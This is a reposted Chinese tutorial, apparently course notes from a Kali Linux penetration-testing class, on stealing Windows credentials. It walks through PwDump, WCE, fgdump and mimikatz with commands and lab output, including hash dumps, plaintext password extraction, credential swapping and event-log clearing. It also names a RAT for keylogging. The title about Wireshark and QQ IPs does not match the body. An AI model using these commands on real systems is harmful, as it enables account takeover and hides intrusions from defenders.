wireshark抓取qq好友ip

转载

mob64ca1405d568 2024-11-26 08:33:34

文章标签 wireshark抓取qq好友ip kali-linux Windows Kali Wireshark 文章分类 架构后端开发

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程，教程为安全牛课堂里的《Kali Linux 渗透测试》课程
抓包嗅探
键盘记录本地密码
查看本地缓存密码
WCE (WINDOWS CREDENTIAL EDITOR)
fgdump
mimikatz

###1. 抓包嗅探###

Windows

Wireshark
Omnipeek
Commview
Sniffpass：抓取密码相关的数据包

Linux

Tcpdump
Wireshark
Dsniff：抓取密码相关的数据包

###2. 键盘记录本地密码###

可以使用木马软件 DarkCometRAT
在控制目标主机之后可以监控键盘记录信息

###3. 查看本地缓存密码###

在浏览器查看缓存密码
windows 密码恢复工具
Windows Password Recovery Tools
使用 Pwdump 查看 windows 本地登录密码

windows 登录密码保存在 C:\Windows\System32\config\SAM 文件中
Pwdump 在 kali 系统中可以找到 /usr/share/windows-binaries/fgdump/
添加用户

C:\Documents and Settings\kevin>net user user2 123456 /add
  C:\Documents and Settings\kevin>net user
  	\\ICST-WINATT 的用户帐户
  	-------------------------------------------------------------
  	Administrator            Guest                    HelpAssistant
  	kevin                    SUPPORT_388945a0         test
  	user1                    user2
  C:\Documents and Settings\kevin>cd \
  C:\>PwDump.exe localhost
  	Administrator:500:18D583B495C4696AFF17365FAF1FFE89:5D36F0CA14EEBEF32F55C7B6A4675DB0:::
  	Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
  	HelpAssistant:1000:5906F3A72959D5902440275BA555A537:10AA20D63C3EC71E0102AC95ADF6DF73:::
  	kevin:1004:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
  	SUPPORT_388945a0:1002:NO PASSWORD*********************:8AFA81401E8D8EBFA42B4E46F6507C07:::
  	test:1005:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
  	user1:1006:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
  	user2:1007:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::Completed.
  # 结果：前部分是 LMHASH ，后部分是 NTLMHASH

可以将结果保存在文件中，然后在 kali 中进行破解

###4. WCE (WINDOWS CREDENTIAL EDITOR)###

WINDOWS身份认证过程
WCE (WINDOWS CREDENTIAL EDITOR)

windows 内核中保存有密码明文副本，安全机制较低
需要管理员权限
工具保持在 kali 的 /usr/share/wce/wce-universal # 通用格式是自动识别32位和64位
多用户登录目标主机
列举登录账号及会话

C:\>wce-universal.exe -lv
  	0020B19D:user1:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
  	# 与 C:\>PwDump.exe localhost 结果相同

每隔5秒刷新一次
C:>wce-universal.exe -r
删除登录会话

C:\>wce-universal.exe -d 0020B19D
  C:\>wce-universal.exe -lv
  	001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0

计算密码对应的 HASH 值

C:\>wce-universal.exe -g passwd
  	Password:   passwd
  	Hashes:     91C7AE7122196B5EAAD3B435B51404EE:22315D6ED1A7D5F8A7C98C40E9FA2DEC

读取内核中的明文密码

C:\>wce-universal.exe -w
  	user1\ICST-WINATT:123456
  	user2\ICST-WINATT:123456
  	test\ICST-WINATT:123456
  	kevin\ICST-WINATT:123456
  	NETWORK SERVICE\MSHOME:
  
  C:\>net user user1 111222
  	命令成功完成。
  C:\>wce-universal.exe -w
  	user1\ICST-WINATT:123456
  	user2\ICST-WINATT:123456
  	test\ICST-WINATT:123456
  	kevin\ICST-WINATT:123456
  	NETWORK SERVICE\MSHOME:
  # 当前内核中保存的值会在下次登录被读取出来

对 LUID 进行修改（将LUID改为匹配其他用户的用户名和密码）

C:\>wce-universal.exe -lv
  	001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
  C:\>wce-universal.exe -i 001E5D92 -s kevin:ICST-	WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	Changing NTLM credentials of logon session 001E5D92h to:
  	Username: kevin
  	domain: ICST-WINATT
  	LMHash: 44EFCE164AB921CAAAD3B435B51404EE
  	NTHash: 32ED87BDB5FDC5E9CBA88547376818D4
  	NTLM credentials successfully changed!
  C:\>wce-universal.exe -lv
  	001E5D92:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0

Win7 及之前默认都可遭受 WCE 攻击
防范方法：修改注册表

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages

删除 wdigest 之后重启计算机

wireshark抓取qq好友ip_Wireshark

###5. fgdump ###

PwDump localhost
位置：Pwdump 在 kali 系统中可以找到 /usr/share/windows-binaries/fgdump/
fgdump
位置：Pwdump 在 kali 系统中可以找到 /usr/share/windows-binaries/fgdump/
放在 WinXP 中，双击或在命令行执行 fgdump.exe 会自动生成三个文件，文件中保存着密码

###6. mimikatz ###

在 kali 中的路径 /usr/share/mimikatz，将 win32 复制到 windows 主机

C:\Win32>mimikatz.exe
  查看帮助是：：
  mimikatz # ::
  	        standard  -  Standard module  [Basic commands (does not require module name)]
  	          crypto  -  Crypto Module
  	        sekurlsa  -  SekurLSA module  [Some commands to enumerate credentials...]
  	        kerberos  -  Kerberos package module  []
  	       privilege  -  Privilege module
  	         process  -  Process module
  	         service  -  Service module
  	         lsadump  -  LsaDump module
  	              ts  -  Terminal Server module
  	           event  -  Event module
  	            misc  -  Miscellaneous module
  	           token  -  Token manipulation module
  	           vault  -  Windows Vault/Credential module
  	     minesweeper  -  MineSweeper module
  	             net  -
  	           dpapi  -  DPAPI Module (by API or RAW access)  [Data Protection application programming interface]
  	       busylight  -  BusyLight Module
  	          sysenv  -  System Environment Value module
  	             sid  -  Security Identifiers module
  	             iis  -  IIS XML Config module
  	             rpc  -  RPC control of mimikatz			
  mimikatz # privilege::
  			Module :        privilege
  			Full name :     Privilege module
  	
  	           debug  -  Ask debug privilege            * *
  	          driver  -  Ask load driver privilege
  	        security  -  Ask security privilege
  	             tcb  -  Ask tcb privilege
  	          backup  -  Ask backup privilege
  	         restore  -  Ask restore privilege
  	          sysenv  -  Ask system environment privilege
  	              id  -  Ask a privilege by its id
  	            name  -  Ask a privilege by its name
  mimikatz # privilege::debug
  mimikatz # sekurlsa::
  mimikatz # sekurlsa::logonPasswords
  mimikatz # sekurlsa::wdigest
  mimikatz # process::list
  mimikatz # lsadump::sam
  mimikatz # lsadump::cache
  mimikatz # ts::multirdp
  mimikatz # event::clear
  mimikatz # event::drop
  mimikatz # misc::regedit
  mimikatz # token::whoami

本文章为转载内容，我们尊重原作者对文章享有的著作权。如有内容错误或侵权问题，欢迎原作者联系我们进行内容更正或删除文章。